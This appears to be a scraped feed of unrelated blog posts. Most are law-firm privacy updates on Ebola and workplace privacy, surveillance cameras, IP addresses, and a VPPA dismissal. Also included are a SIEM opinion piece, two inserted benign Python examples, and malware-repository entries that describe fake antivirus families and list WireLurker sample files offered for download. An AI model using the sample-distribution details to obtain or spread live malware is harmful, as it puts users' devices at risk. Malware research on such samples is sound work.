Fears of a worldwide Ebola pandemic appear to have abated, but the tension between workplace safety and employee privacy, thrown into relief by this health emergency, remains an issue relevant to all employers. Any potential health threat created by contagious illness requires employers to plan and put into effect a reasonable response, including policies governing the terms and conditions under which employees may be required to stay away from the workplace, and in which their health care information may be relevant to workplace decisions.

The likelihood of contracting Ebola from employees who may have been exposed to the disease is low, and fears of association with such individuals usually are scientifically unfounded. The decision regarding whether potentially exposed individuals should be barred from the workplace is particularly difficult. Employers do not want to appear hysterical; yet they need to be prudent about protecting co-workers, customers, visitors and vendors. Also, a very real risk exists that an infected employee on a manufacturing floor or otherwise in the chain of commerce could create a panicked boycott of the goods/services of their employer. As one way to address these issues, some employers have adopted policies that those employees who travel to the impacted areas in West Africa will not be able to return to work until 21 days after their last possible exposure. Such policies make particular sense for employers in the health care field. In cases where the employee has not made a choice – for example, when an employee is identified by public health officials as someone who may have been exposed, employers may decide to have any mandated leave time be paid. Telecommuting, if feasible, also is a good option. In unionized workplaces, these issues normally will be mandatory subjects of bargaining; employers who unilaterally implement such procedures may be engaging in unfair labor practices in violation of the National Labor Relations Act.

No approach to these issues will be free from legal risk.  Attempts to limit access to the workplace also expose employers to claims of discrimination under the Americans with Disabilities Act (“ADA”) or (for entities receiving federally funded assistance) the Rehabilitation Act of 1973 (“Rehab Act”). In addition to protecting qualified applicants and employees with disabilities from employment discrimination, these statutes prohibit discrimination based on an employee’s relationship or association with an individual who has a disability. See 42 U.S.C. § 12112(b)(4). Although temporary viral illnesses do not normally meet the definition of “disability” under the ADA, some Ebola-related conditions and long-term side effects may rise to that level, particularly in light of the more expansive definition of the term “disability” under the Americans with Disabilities Act Amendments Act of 2008.

Significantly, there is no requirement under the ADA or the Rehab Act that the employee’s association with a person potentially exposed to Ebola be a family relationship. The key question is whether the employer is motivated by an individual’s relationship or association with any person who has a disability. The Equal Employment Opportunity Commission’s publication entitled “Questions and Answers About the Association Provision of the Americans with Disabilities Act” provides helpful guidance on this issue, implicitly acknowledging a zone of privacy around an individual’s personal associational choices.

Perhaps the thorniest privacy issue facing employers with regard to contagious illnesses is the extent to which they may disclose information about an employee’s medical condition. Media attention to the particulars of each diagnosed case of Ebola outside of West Africa presents employers (particularly health care providers) with the Hobson’s choice of being transparent enough to reassure the public and opaque enough to protect employee privacy.

The Health Insurance Portability and Accountability Act of 1996 (“HIPAA”), enforced by the Office for Civil Rights of the Department of Health and Human Services, protects the confidentiality of protected health information by generally prohibiting its disclosure in the absence of explicit authorization from a patient. However, HIPAA applies only to health plans, health care clearinghouses, and most health care providers. It does not apply to employers – for instance, if an employer provides a self-insured health plan for employees, the plan, but not the employer, is subject to HIPAA. Moreover, HIPAA specifically exempts disclosures of health information made for purposes of worker’s compensation-related matters.

Thus, the significant amount of employee health information to which employers obtain access by virtue of standard workplace policies and procedures – medical appointment verification forms from physicians, verification of conditions qualifying for family and medical leave, explanations for routine absences, drug testing results, the results of medical examinations that are rationally related to job duties – is not subject to certain HIPAA requirements. Analogous state laws may provide greater protection. California’s Confidentiality of Medical Information Act, for instance, requires employers to protect the privacy and security of any medical information they receive. (Cal. Civ. Code §§ 56.20-56.245.) At bottom, however, most employers are more likely to face liability for disclosure of medical information under common law invasion of privacy theories (e.g., unreasonable intrusion upon seclusion) than under HIPAA or analogous state statutes.

Employee concerns about co-workers with contagious illnesses may be channeled into productive and appropriate efforts to prevent contagion. These may include education and training of employees, medical services such as vaccination and post-exposure medicine, modifying the work environment to provide additional protection, such as installing physical barriers (clear plastic sneeze guards), conducting business through drive-through service windows, improving ventilation, installing additional hand sanitizer dispensers and, where appropriate, providing protective personal equipment such as respirators and surgical masks.

While Ebola does not meet the definition of “pandemic,” OSHA’s general guidance on protecting workers during a pandemic prescribes evaluation of contagion risks based on specific job activities that may expose people to infection. Emergency responders and workers in critical infrastructure and key resource sectors (including employees in the fields of health care, laboratory work, mortuary/death care, emergency transport and airline services) face greater risks of infection than employees who do not regularly interact with the general public. OSHA regulations prescribe safety standards for such individuals, including OSHA’s Bloodborne Pathogens standard (29 CFR 1910.1030), Respiratory Protection standard (29 CFR 1910.134), and Personal Protective Equipment standard (29 CFR 1910.132).

Thoughtful and deliberate planning at the senior levels of an organization, ongoing monitoring of the most recent reports and recommendations from the CDC, the WHO and other health organizations, and investment in employee education and training will allow employers to safely navigate competing concerns about workplace safety and worker privacy.

IAPP Europe Data Protection Congress 2014

Join us at the International Association of Privacy Professionals (“IAPP”) Data Protection Congress in Brussels, November 18-20, 2014. Hunton & Williams privacy professionals will be featured speakers in the following sessions:

  • Internet of Things, Data Protection and Security: What are the Legal Challenges, and How Do We Overcome Them?
    Preconference Workshop: Tuesday, November 18, 2:00 p.m.
    Dr. Jörg Hladjk, counsel, Hunton & Williams; Mathias Cellarius, Data Protection Officer and Head of Regulatories and Processes Global Legal, SAP SE; Ioannis Krontiris, Privacy Expert, European Research Center, Huawei Technologies; and Stefan Schiffner, Expert in Network & Information Security, ENISA.
  • Adviser? Auditor? Enforcer? Facilitator? The Evolving Role of the DPO
    Wednesday, November 19, 11:30 a.m.
    Speakers include: Bridget Treacy, partner, Hunton & Williams; Tobias Brautigam, Senior Legal Counsel, Microsoft Corporation; Yvonne Cunnane, Head of Data Protection, Facebook; Stephan Geering, EMEA Data Protection Officer, Citigroup; and Philippe Renaudière, Data Protection Officer, European Commission.
  • Privacy Risk Framework and Risk-Based Approach: Delivering Effective Data Protection in Practice
    Wednesday, November 19, 5:15 p.m.
    Speakers include: Bojana Bellamy, President, Centre for Information Policy Leadership at Hunton & Williams LLP; Mikko Niva, Director of Privacy, Nokia Corporation; and JoAnn C. Stonier, Executive Vice President, Information Governance and Chief Privacy Officer, MasterCard.
  • EU BCRs and APEC CBPRs: Cornerstones for Future Interoperability?
    Wednesday, November 19, 5:15 p.m.
    Markus Heyder, Vice President and Senior Policy Counselor, Centre for Information Policy Leadership at Hunton & Williams LLP will moderate the panel. Speakers include: Wim Nauwelaerts, partner, Hunton & Williams; Christina Peters, Chief Privacy Officer, IBM Corporation; Daniel Pradelles, EMEA Privacy Officer, Hewlett-Packard; Florence Raynal, Head of the Department of European and International Affairs, CNIL; and Hilary Wandall, Compliance and Chief Privacy Officer, Merck & Co., Inc.
  • Making Accountability Work for You
    Thursday, November 20, 9:00 a.m.
    Bridget Treacy will moderate the panel. Speakers include: Ellis I. Parry, Global Lead of Data Privacy, BP International Ltd. and Louise Thorpe, Vice President of Global Privacy, American Express.

In addition to these panels, stop by Booth 17 in the Exhibit Hall to learn more about Hunton & Williams’ Global Privacy and Cybersecurity practice and its Centre for Information Policy Leadership. Visit the IAPP’s website for more information and the full conference schedule.

Sirius Multirogue 2014

This Chameleon fake Antivirus is looking for the OS version (XP, Vista, Seven) and changes its name and skin: Sirius Win 7 Protection 2014, Sirius Win 8 Antivirus 2014, Sirius Vista Protection 2014, (...). It detects fake infections and displays alert messages to scare users. It belongs to the Braviax/FakeRean family.

Windows Antivirus Adviser

Windows Antivirus Adviser is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Internet Guard, Windows Internet Watchdog, Windows Web Watchdog, Windows AntiBreach Patrol, Windows Antivirus Patrol, Windows Pro Defence Kit, Windows Security Master, Windows Defence Unit, Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master.

To register (and help removal), copy paste this code: 0W000-000B0-00T00-E0021

Thanks to @kafeine for the sample

GPEN Holds Workshop on the Use of Publicity as a Regulatory Compliance Technique

On November 1, 2014, the Global Privacy Enforcement Network (“GPEN”) posted a media release on its workshop held on October 12, 2014, in Mauritius on the use of publicity as a regulatory compliance technique. The workshop, attended by 44 commissioners and staff from around the world, focused on different issues concerning privacy enforcement, including the effectiveness of monetary penalties in enforcing data protection laws and the diverse approaches to enforcement publicity. In addition, there was a public demonstration of the recently expanded World Legal Information Institute’s International Privacy Law Library, which is said to be the largest freely accessible and searchable database of privacy law materials in the world.

GPEN is a network of approximately 50 privacy enforcement authorities from around the world. The network’s U.S. members include the Federal Trade Commission and the Federal Communications Commission. GPEN’s mission is to connect “privacy enforcement authorities from around the world to promote and support cooperation in cross-border enforcement of laws protecting privacy.” GPEN’s past activities have included coordinated international enforcement sweeps concerning such issues as mobile app privacy and privacy notices posted by major websites.

UK ICO Issues Code of Practice Regarding the Use of Surveillance Cameras

On October 15, 2014, the UK Information Commissioner’s Office (“ICO”) published a code of practice regarding the use of surveillance cameras (“Code of Practice”). The Code of Practice explains how the legal requirements of the Data Protection Act 1998 apply to operators of surveillance cameras. Practical and technological advancements have led to a wide variety of surveillance camera technologies that differ from traditional CCTV (e.g., Automatic Number Plate Recognition cameras and body-worn cameras). The Code of Practice addresses (1) changes in technology and (2) inconsistent standards that have arisen in various sectors since the ICO last updated its guidance on CCTV systems in 2008. In particular, due to technological advancements, surveillance cameras are no longer merely passive recording devices; they can be used to identify specific items or individuals, keep detailed records of events, and are increasingly portable and discreet.

The Code of Practice covers the use of traditional CCTV systems as well as more sophisticated surveillance systems, including:

  • Automatic Number Plate Recognition;
  • Body-worn video;
  • Unmanned aerial systems (e.g., drones); and
  • Other systems that capture information of identifiable individuals.

The Code of Practice provides guidance and good practice tips on key areas for data protection compliance, including (1) the circumstances in which surveillance systems should be used, (2) camera positioning, (3) data subject access requests, (4) data retention and disposal, (5) disclosure of footage to third parties and (6) notifying relevant individuals. In addition, Section 7 of the Code of Practice focuses on more sophisticated surveillance systems such as those that use profiling technology or automatic recognition technology.

The Code of Practice also reflects the wider regulatory environment for surveillance systems, including the Surveillance Camera Code of Practice (“POFA Code”) issued under the Protection of Freedoms Act 2012. Data controllers are encouraged, but not required (except for certain public authorities), to comply with the POFA Code. The ICO Code of Practice is consistent with the POFA Code and cross-references the 12 guiding principles outlined in the POFA Code.

Wirelurker for OSX, iOS (Part I) and Windows (Part II) samples


PART II

Wirelurker for Windows (WinLurker)

Research: Palo Alto, Claud Xiao: Wirelurker for Windows

Sample credit: Claud Xiao



PART I


Research: Palo Alto, Claud Xiao: WIRELURKER: A New Era in iOS and OS X Malware

Palo Alto | Claud Xiao - blog post: Wirelurker

Wirelurker Detector https://github.com/PaloAltoNetworks-BD/WireLurkerDetector


Sample credit: Claud Xiao


Download

Download Part I
Download Part II

Email me if you need the password

List of files
List of hashes 

Part II

│   apps.ipa
│   微博 3.4.1.dmg

└───WhatsAppMessenger 2.11.7
            libiconv-2_.dll
            libxml2.dll
            libz_.dll
            mfc100u.dll
            msvcr100.dll
            WhatsAppMessenger 2.11.7.exe
            zlib1.dll
            使用说明.txt


Part I

File listing

├───databases
│       foundation
├───dropped
│   ├───version_A
│   │   │   com.apple.globalupdate.plist
│   │   │   com.apple.machook_damon.plist
│   │   │   globalupdate
│   │   │   machook
│   │   │   sfbase.dylib
│   │   │   watch.sh
│   │   │
│   │   ├───dylib
│   │   │       libcrypto.1.0.0.dylib
│   │   │       libiconv.2.dylib
│   │   │       libimobiledevice.4.dylib
│   │   │       liblzma.5.dylib
│   │   │       libplist.2.dylib
│   │   │       libssl.1.0.0.dylib
│   │   │       libusbmuxd.2.dylib
│   │   │       libxml2.2.dylib
│   │   │       libz.1.dylib
│   │   │
│   │   ├───log
│   │   └───update
│   ├───version_B
│   │       com.apple.globalupdate.plist
│   │       com.apple.itunesupdate.plist
│   │       com.apple.machook_damon.plist
│   │       com.apple.watchproc.plist
│   │       globalupdate
│   │       itunesupdate
│   │       machook
│   │       start
│   │       WatchProc
│   │
│   └───version_C
│       │   com.apple.appstore.plughelper.plist
│       │   com.apple.appstore.PluginHelper
│       │   com.apple.MailServiceAgentHelper
│       │   com.apple.MailServiceAgentHelper.plist
│       │   com.apple.periodic-dd-mm-yy.plist
│       │   com.apple.systemkeychain-helper.plist
│       │   periodicdate
│       │   stty5.11.pl
│       │   systemkeychain-helper
│       │
│       └───manpath.d
│               libcrypto.1.0.0.dylib
│               libiconv.2.dylib
│               libimobiledevice.4.dylib
│               libiodb.dylib
│               liblzma.5.dylib
│               libplist.2.dylib
│               libssl.1.0.0.dylib
│               libusbmuxd.2.dylib
│               libxml2.2.dylib
│               libz.1.dylib
│               libzip.2.dylib
├───iOS
│       sfbase.dylib
│       sfbase_v4000.dylib
│       sfbase_v4001.dylib
│       start
│       stty5.11.pl
├───IPAs
│       7b9e685e89b8c7e11f554b05cdd6819a
│       pphelper
├───original
│       BikeBaron
│       CleanApp
│       FontMap1.cfg
│       start.sh
└───update
        start.sh
        update

German Court Asks European Court of Justice if IP Addresses are Personal Data

On October 28, 2014, the German Federal Court of Justice referred the question of whether an IP address constitutes personal data under the EU Data Protection Directive 95/46/EC (“EU Data Protection Directive”) to the European Court of Justice (“ECJ”). The German court referred the question to the ECJ for a preliminary ruling in connection with a case that arose in 2008 when a German citizen challenged the German federal government’s storage of the dynamic IP addresses of users on government websites. The citizen’s claim initially was rejected by the court of first instance. The claim was granted, however, by the court of second instance to the extent it referred to the storage of IP addresses after the users left the relevant government websites. Subsequently, both parties appealed the decision to the German Federal Court of Justice.

The German Federal Court of Justice has suspended the proceedings and referred two questions to the ECJ:

  • Whether, under Article 2A of the EU Data Protection Directive, an IP address is personal data (i.e., any information relating to an identified or identifiable natural person) when the IP address is stored by an Internet service provider (“ISP”) and a third party (e.g., the ISP) possesses sufficient additional data to identify the user.
  • Whether the EU Data Protection Directive is contrary to a provision in the German Telemedia Act. According to the relevant provision of the Telemedia Act, a website provider may collect and process the personal data of users without their consent only to the extent it is necessary to (1) enable the general functionality of the website or (2) arrange payment. In addition, the relevant provision of the Telemedia Act states that enabling the general functionality of the website does not permit user data to be processed after the user closes, or navigates away from, the website.

New Payment Technologies Should Reduce Demand for Cyber Insurance

Hunton & Williams Insurance Litigation & Counseling partner Lon Berk reports:

As the demand for cyber insurance has skyrocketed, so too has the cost. One broker estimates that sales in 2014 will double from the $1 billion premium collected in 2013. Much of the increase in demand and cost has been the result of the widely publicized hacks of the point-of-sale systems at large retailers, and the primary emphasis of most cyber policies is to address liability arising from such events. New payment technologies, however, will change the need for this type of cyber insurance. American Express recently announced a token service; Apple incorporated ApplePay into its new iPhones; and a group of retailers, the Merchant Customer Exchange, is working on the release of a new payment technology as well. These technologies, although different in detail, eliminate the need for merchants to collect unencrypted payment card information from customers, significantly reducing the risk created by point-of-sale malware.

These technologies work by generating tokens or cryptograms for use at the point of sale. Financial institutions are able to determine whether the tokens or cryptograms are associated with a customer’s account, even though it is virtually impossible for a third party possessing the token or cryptogram alone to identify the account. The exact specifics of the technologies vary, but the end result is that the merchant does not need access to the customer’s unencrypted account information and any data obtained through the point-of-sale malware becomes virtually worthless.

As these payment technologies become prevalent in the U.S., the need for cyber insurance protecting retailers against point-of-sale malware should sharply drop. There still will be a need for coverages protecting against other cyber risks, including other forms of malware and security breaches as well as against business interruptions arising from cyber events. However, the need and demand for cyber insurance covering privacy breaches should be reduced and the pressure on much of the current cyber insurance market removed.
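To make the tokenization argument above concrete, here is an added example that is not part of the original post and is not the design of American Express, Apple Pay or the Merchant Customer Exchange: a toy token service in Python in which the merchant only ever sees a random token and a per-transaction cryptogram, beside a legacy record that carries the raw card number. All names (TokenServiceProvider, CustomerWallet, the merchant ids, the test PAN) are constructed; real network tokenization and EMV cryptograms differ in detail.

```python
import hmac
import hashlib
import secrets

# Constructed sample data: a well-known test PAN and two hypothetical merchant ids.
SAMPLE_PAN = "4111111111111111"
MERCHANT_A = "merchant-A"
MERCHANT_B = "merchant-B"


def make_cryptogram(key, token, merchant_id, counter, amount):
    """Per-transaction cryptogram: HMAC-SHA256 over the transaction fields."""
    msg = f"{token}|{merchant_id}|{counter}|{amount}".encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


class TokenServiceProvider:
    """Hypothetical token service: the only party holding the token -> PAN mapping."""

    def __init__(self):
        self._vault = {}         # token -> (pan, bound merchant, per-token key)
        self._last_counter = {}  # token -> highest transaction counter accepted

    def provision(self, pan, merchant_id):
        token = secrets.token_hex(8)     # random; derives nothing from the PAN
        key = secrets.token_bytes(32)    # shared only with the customer's wallet
        self._vault[token] = (pan, merchant_id, key)
        self._last_counter[token] = 0
        return token, key

    def authorize(self, token, merchant_id, counter, amount, cryptogram):
        """Return True only for a fresh transaction from the bound merchant."""
        entry = self._vault.get(token)
        if entry is None:
            return False                           # unknown token
        pan, bound_merchant, key = entry
        if merchant_id != bound_merchant:
            return False                           # token is merchant-bound
        if counter <= self._last_counter[token]:
            return False                           # replay of a captured message
        expected = make_cryptogram(key, token, merchant_id, counter, amount)
        if not hmac.compare_digest(expected, cryptogram):
            return False                           # tampered fields or wrong key
        self._last_counter[token] = counter
        return True                                # issuer would now post to `pan`


class CustomerWallet:
    """Customer's payment app: knows token and key, never hands the PAN to the merchant."""

    def __init__(self, token, key):
        self.token, self.key, self.counter = token, key, 0

    def pay(self, merchant_id, amount):
        self.counter += 1
        return {
            "token": self.token, "merchant_id": merchant_id,
            "counter": self.counter, "amount": amount,
            "cryptogram": make_cryptogram(self.key, self.token, merchant_id,
                                          self.counter, amount),
        }


def legacy_pos_record(pan, amount):
    """Legacy POS record: the raw PAN passes through the merchant and is stored as-is."""
    return {"pan": pan, "amount": amount}


def tokenized_purchase():
    """One tokenized purchase, then what a copy of the merchant-side data is worth."""
    tsp = TokenServiceProvider()
    token, key = tsp.provision(SAMPLE_PAN, MERCHANT_A)
    wallet = CustomerWallet(token, key)

    txn = wallet.pay(MERCHANT_A, "19.99")
    first_ok = tsp.authorize(**txn)

    # `txn` is everything the merchant (and anything reading its memory) ever sees.
    return {
        "authorized": first_ok,
        "pan_visible": SAMPLE_PAN in str(txn),                # PAN never present
        "replay_accepted": tsp.authorize(**txn),              # same message again
        "other_merchant_accepted": tsp.authorize(**dict(txn, merchant_id=MERCHANT_B)),
    }
```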

SIEM 3.0 – Continuing to Deliver on Failed Promises

SIEM - Security Information and Event Management - has been a product for many, many years now and virtually every organization out there has bought into the promise of what SIEM will bring. Since the term was coined in 2005, the security industry has largely struggled to deliver on all the promises the product family made.


Bring on the Blame

- We can blame marketing professionals who over-hyped the capabilities and wowed buyers with their mastery of buzzwords.
- We can blame the product managers for failing to build coherent features and functionality that were based on anything resembling actual use-cases.
- We can blame user interface designers for making products that take a 40-hour course to understand and a 1,000-page tome to utilize.
- We can blame sales executives for pushing products as solutions when most enterprises simply weren't ready to divert resources into implementation of yet another security project.
- We can blame sales engineers for convincing enterprise security professionals that a few carefully planned demo scripts could be practically implemented in their environment with any success.
- We can blame CISOs for failing to have a salient security strategy and instead chasing "shiny objects".
- We can blame security professionals for having no grasp of use-cases, or even bothering to fully operationalize one product before moving on to the next like a child with ADHD.

You see, the reality is I think everyone is equally culpable for the state of enterprise security right now. Specifically looking at SIEM, the hysteria has long gone over the back-side of the hype curve so we're forced to create new curves to go over.

Up, Up, and Up Some More

It's like a repetitive cycle, with only one small problem. If we keep setting new and higher expectations through hype after first failing to meet previous expectations it sets the whole thing up for a monumental fall - eventually. You see, we haven't yet fallen down the back-side of the hype curve...not totally. Every time we do someone invents another term.

Case in point, "SIEM 2.0" and associated silliness. Why did we need the term SIEM 2.0? I honestly didn't know what it meant so I asked a few people whose business it was to build, sell, or operationalize SIEM. The answer I heard the most often was this:
"SIEM 2.0 is another attempt at SIEM. The first time we barely got the log aggregation. This time we're going to try and achieve correlation."
Mind. Exploded.

So if I understand this, SIEM 2.0 is a term created because SIEM has miserably failed to deliver value, based on what it was sold as. Am I getting this right?

At this point, the hype knob goes to 12. I've heard a SIEM can be leveraged to detect fraud, APTs, botnets, malicious insiders, and behavioral anomalies. SIEMs are local appliances, virtual images, cloud-based, and of course leverage "big data". SIEMs feature log collection, aggregation, correlation, analysis and custom rules development. Did I miss anything?

Analysts, Leaders, Visionaries, and Execution

What really boils my bunny is every time one of these mystic quadrants shows up I sit and scratch my head and wonder how these things are done. Clearly the analysts haven't talked to any real users of the products because they would hear the same things I do - disappointment, anger, and disillusionment.

What separates a leader from a visionary? The ability to execute? And if that's true - how do we define successful execution? What test-cases are we using and who gets to determine succeed or fail?

Completeness of vision is great, but failure to execute makes that worthless. On the other side of that coin, execution is brilliant unless you're executing on dated and undesirable features. Where do we factor in the success KPIs?

The security professionals and executives I talk to have a clear emphasis on execution. Make it work. Make it do what it's supposed to do. Make it relatively operational with minimum additional resources, since that's the point, after all, isn't it?

Actually that's an interesting point - what does the enterprise security professional expect from their SIEM product? What are the use-cases that are most useful to the broadest enterprise community? What features and functions could we simply throw away without anyone noticing - because no one uses them?

Does being a leader mean you are telling your customers and end-users what they should be doing? Or is that the role of the visionary? Who is really driving this bus?

On Point

So let me close this post out with a proposal. How about we start over, again, for the first time. Let's call it SIEM 3.0, or Next-Gen SIEM, or SIEM Type-R (R for reinvented). I don't care what you call it, but let's start by getting together some focus groups of enterprises large and small. Let's get them talking, building use-cases and then let's define products, services and operational strategy around that. Once you've got the thing going, let's talk about maintenance, management, and operationalizing the thing so that the number of systems submitting logs doesn't mysteriously drop over time, or the blinking alerts don't go un-noticed or un-actioned.
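The log-source drop-off named above is the one SIEM operational check a detection team can actually automate, so here is an added example (not from the original post and not any vendor's feature): a Python health check that takes ingest metadata lines, compares each expected source's last event against a per-source maximum gap, and reports sources gone silent, sources never seen, and sources nobody inventoried. The sample lines, host names and gap baselines are constructed.

```python
import re
from datetime import datetime

# Constructed ingest-metadata lines: "<timestamp> <reporting host> <message>".
# Only the first two fields matter to the health check; the message is ignored.
SAMPLE_EVENTS = """\
2014-11-10T08:00:00 fw01 ACCEPT tcp 10.0.0.5:51522 -> 10.0.1.8:443
2014-11-10T08:01:00 dc01 4624 logon success user=jsmith
2014-11-10T08:02:00 web01 GET /index.html 200
2014-11-10T08:04:00 fw01 DROP udp 10.0.0.9:137 -> 10.0.1.255:137
2014-11-10T08:09:00 fw01 ACCEPT tcp 10.0.0.7:40211 -> 10.0.1.8:443
2014-11-10T08:12:00 web01 GET /login 302
2014-11-10T08:14:00 fw01 ACCEPT tcp 10.0.0.5:51530 -> 10.0.1.8:443
2014-11-10T08:20:00 printer7 syslog: job queued
2014-11-10T08:21:00 web01 POST /login 200
"""

# Inventory of sources the SIEM must hear from, with the longest normal gap
# (in minutes) between two events from each. Constructed baseline values; in
# practice derive them from a few weeks of observed inter-event times.
EXPECTED_MAX_GAP_MIN = {
    "fw01": 10,   # busy firewall: should never be quiet for 10 minutes
    "dc01": 15,   # domain controller
    "web01": 15,  # web server
    "vpn01": 60,  # VPN concentrator: low volume, hourly is normal
}

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(.*)$")


def parse_events(text):
    """Return (timestamp, host) pairs; malformed lines are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, host, _msg = m.groups()
        events.append((datetime.fromisoformat(ts), host))
    return events


def source_health(events, expected_max_gap_min, now):
    """Compare each source's last event time against its expected maximum gap.

    Returns {"silent": {host: minutes_since_last_event},
             "never_seen": [hosts in inventory with no events],
             "unexpected": [hosts sending events but not in inventory]}
    """
    last_seen = {}
    for ts, host in events:
        if host not in last_seen or ts > last_seen[host]:
            last_seen[host] = ts

    report = {"silent": {}, "never_seen": [], "unexpected": []}
    for host, max_gap in expected_max_gap_min.items():
        if host not in last_seen:
            report["never_seen"].append(host)          # never onboarded or broken
        else:
            gap_min = int((now - last_seen[host]).total_seconds() // 60)
            if gap_min > max_gap:
                report["silent"][host] = gap_min       # went quiet: agent? pipeline?
    for host in last_seen:
        if host not in expected_max_gap_min:
            report["unexpected"].append(host)          # inventory is out of date
    report["never_seen"].sort()
    report["unexpected"].sort()
    return report


def run_sample(now_iso="2014-11-10T08:25:00"):
    """Run the check over the constructed data at a fixed 'now'."""
    return source_health(parse_events(SAMPLE_EVENTS), EXPECTED_MAX_GAP_MIN,
                         datetime.fromisoformat(now_iso))


if __name__ == "__main__":
    for kind, value in run_sample().items():
        print(f"{kind}: {value}")
```

Scheduling this against the ingest pipeline's own metadata (not the raw log bodies) gives the "how many systems are still sending" number the post asks for as a daily signal rather than a surprise during an incident.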

Maybe once we get past all the failed promises, we can start to develop real and useful tools that help security rather than hinder it. It's clear to me that enterprise security professionals spend way too much time fighting the technology that's supposedly helping them, which leaves little time to fight the actual bad guys. Security suffers from an operational problem, not a tools problem. The tools are there, just the operational processes and methodologies are missing, poorly developed, or just plain broken.

This thought needs further development - but this has been bugging me long enough so that I finally had to sit down and write it out. I hope you found some useful points amongst the ranting.

Federal District Court Grants Motion to Dismiss a Class Action Alleging Impermissible Sharing of Personal Information Under the Video Privacy Protection Act

On October 8, 2014, the United States District Court for the Northern District of Georgia granted Cartoon Network, Inc.’s (“Cartoon Network’s”) motion to dismiss a putative class action alleging that Cartoon Network’s mobile app impermissibly disclosed users’ personally identifiable information (“PII”) to a third party data analytics company under the Video Privacy Protection Act (“VPPA”).

Cartoon Network’s mobile app allowed consumers to view video content via their mobile device. Each time a user accessed the mobile app, the app would disclose the user’s Android ID and “a complete record of the user’s video history” to a third party data analytics company that specialized in tracking users across mobile apps and websites. An Android ID is a “randomly generated number that is unique to each user and device.” According to the complaint, the disclosures of customers’ viewing records occurred without consumer consent and violated the VPPA.

In granting Cartoon Network’s motion to dismiss, the court stated the information disclosed to the data analytics company was not PII and thus, there was no violation of the VPPA. The VPPA defines PII as “information which identifies a person as having requested or obtained specific video materials or services from a video tape service provider.” According to the court, an Android ID (coupled with video viewing history) is not PII because it does not identify a specific person. Although the plaintiffs alleged that the analytics company was able to connect specific individuals to Android IDs provided by Cartoon Network through information obtained from other sources, the court dismissed the complaint stating that the analysis focuses on the information disclosed, not on what the recipient is able to do with the information.

“One-Stop-Shop” Under the Proposed EU Regulation: A Way Forward

This week, the Article 29 Working Party (“Working Party”) prepares to debate various proposals on the “one-stop-shop” mechanism under the proposed EU General Data Protection Regulation (“Regulation”). Hunton & Williams’ Global Privacy and Cybersecurity practice and its Centre for Information Policy Leadership submitted a strategy paper on the one-stop-shop to the Working Party. The paper proposes a methodology for selecting and defining the role of a lead regulatory authority with the objective of making the one-stop-shop more operational, flexible and viable. The work draws on a more detailed article published on November 3, 2014, by Hunton & Williams senior attorney Rosemary Jay in the magazine for the Society for Computers and Law, entitled The “One Stop Shop” – Working in Practice.

